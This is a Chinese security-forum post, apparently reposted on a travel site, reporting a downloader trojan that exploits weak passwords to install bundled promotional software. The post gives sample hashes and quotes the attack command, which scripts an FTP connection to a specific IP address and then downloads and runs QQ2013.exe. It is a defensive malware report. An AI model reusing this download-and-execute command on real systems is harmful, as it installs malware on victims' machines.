个个游|个人自助旅游网

 找回密码
 注册
搜索
查看: 47930|回复: 0
打印 上一主题 下一主题

金山病毒推广还没停?新发现的下载者病毒样本

[复制链接]
跳转到指定楼层
1#楼
发表于 2013-5-11 12:32:20 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  还是用的弱密码漏洞,和“黑鹰”病毒的手法差不多(具体可见之前的帖子:h ttp://bbs.kafan.cn/thread-1494510-1-1.html)。
  
  这次推广的软件包括金山卫士、金山毒霸、猎豹浏览器、无极影音、百度浏览器、PPTV等等十几款,这已经是最近一个多月以来的第5次了。从日志上看,在凌晨0点到1点这段时间黑客开始攻击,每小时大概能有10-20次攻击。
  
  并且,金山毒霸对这两个样本都不拦截。。。
  
  样本MD5:
  4EBE7AE4E14D68AE1019E48016A1C0EF
  019A1305C5F7E8A814092DC8D8C2B6C4
  用作分析的样本MD5:019A1305C5F7E8A814092DC8D8C2B6C4
  
  /c@echoopen198.100.120.148>>log.dat&@echo123>>log.dat&@echo123>>log.dat&@echobin>>log.dat&@echogetQQ2013.exe>>log.dat&@echobye>>log.dat&@ftp-s:log.dat&dellog .dat&QQ2013&QQ2013.exe&QQ2013.exe
  
  1、黑客的ftp:

  2、木马是个百度网盘转换器。

  3、因为和黑鹰类似,中间过程不再详述了,感兴趣的可以自己去查一下h ttp://bbs.kafan.cn/thread-1494510-1-1.html
  4、下载者木马在安装程序,有十几款
您需要登录后才可以回帖 登录 | 注册

本版积分规则

手机访问本页请
扫描左边二维码
         本网站声明
本网站所有内容为网友上传,若存在版权问题或是相关责任请联系站长!
站长联系QQ:7123767   myubbs.com
         站长微信:7123767
请扫描右边二维码
www.myubbs.com

Archiver|手机版|小黑屋|个个游|个人自助旅游网 ( 琼ICP备12002442号-29 )

GMT+8, 2024-4-26 23:10 , Processed in 0.101821 second(s), 15 queries .

Powered by 高考信息网 X3.3

© 2001-2013 大学排名

快速回复 返回顶部 返回列表